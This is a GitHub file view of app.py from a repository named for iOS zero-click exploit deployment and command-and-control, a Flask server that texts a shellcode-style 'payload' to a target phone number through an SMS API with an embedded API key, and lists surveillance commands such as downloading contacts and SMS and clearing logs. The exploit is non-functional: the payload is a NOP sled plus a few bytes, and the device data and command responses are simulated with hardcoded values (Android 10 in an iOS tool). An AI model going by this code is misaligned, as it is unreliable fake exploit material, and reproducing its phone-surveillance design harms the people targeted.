iOS-Zero-Click-Exploit-Deployment-C2/app.py at Your-Momma-Beeotch · ProjectZeroDays/iOS-Zero-Click-Exploit-Deployment-C2 · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
from flask import Flask, request, jsonify
import requests
import sqlite3

app = Flask(__name__)

def send_sms(to_phone_number, message):
    url = 'https://textbelt.com/text'
    data = {
        'phone': to_phone_number,
        'message': message,
        'key': '6c6ba6cbbed7e162c975b3d2f8b0b391f8c5f97aQeDibGwKd8KbMQiMV1DSuUkaW'
    }
    try:
        response = requests.post(url, data=data)
        response.raise_for_status()
        return response.json()
    except requests.RequestException as e:
        return {'success': False, 'message': str(e)}

def store_device_info(device_info):
    conn = sqlite3.connect('device_info.db')
    c = conn.cursor()
    c.execute('''CREATE TABLE IF NOT EXISTS devices
                 (ip TEXT, os TEXT, location TEXT)''')
    c.execute("INSERT INTO devices (ip, os, location) VALUES (?, ?, ?)",
              (device_info['ip'], device_info['os'], device_info['location']))
    conn.commit()
    conn.close()

@app.route('/send_sms', methods=['POST'])
def send_sms_route():
    data = request.get_json()
    phone_number = data.get('phoneNumber')
    payload = b"\x90" * 512 + b"\x31\xDB\x53\x43\x41\x50\x54"
    message = payload.decode('latin1')
    result = send_sms(phone_number, message)
    if result.get('success'):
        return jsonify({'message': 'Payload sent successfully!', 'success': True})
    else:
        return jsonify({'message': 'Failed to send payload.', 'success': False})

@app.route('/get_device_info', methods=['POST'])
def get_device_info():
    data = request.get_json()
    phone_number = data.get('phoneNumber')
    # Simulate fetching device information
    device_info = {
        'ip': '192.168.0.100',
        'os': 'Android 10',
        'location': 'Boone, NC, USA'
    }
    store_device_info(device_info)
    return jsonify(device_info)

@app.route('/send_command', methods=['POST'])
def send_command():
    data = request.get_json()
    phone_number = data.get('phoneNumber')
    command = data.get('command')
    # Simulate sending a command to the device
    command_responses = {
        'reboot': 'Device is rebooting...',
        'shutdown': 'Device is shutting down...',
        'get_info': 'Fetching device info...',
        'send_text': 'Sending text message...',
        'make_call': 'Making a call...',
        'view_call_log': 'Viewing call log...',
        'view_text_messages': 'Viewing text messages...',
        'listen_voicemails': 'Listening to voicemails...',
        'view_installed_apps': 'Viewing installed apps...',
        'view_app_usage': 'Viewing app usage...',
        'view_contacts': 'Viewing contacts...',
        'download_sms': 'Downloading SMS messages...',
        'download_call_log': 'Downloading call log...',
        'download_contacts': 'Downloading contacts...',
        'download_app_list': 'Downloading app list...',
        'download_phone_usage': 'Downloading phone usage...',
        'view_processes': 'Viewing processes...',
        'device_console': 'Accessing device console...',
        'clear_logs': 'Clearing logs...'
    }
    message = command_responses.get(command, 'Unknown command.')
    return jsonify({'message': message})

if __name__ == '__main__':
    app.run(debug=True)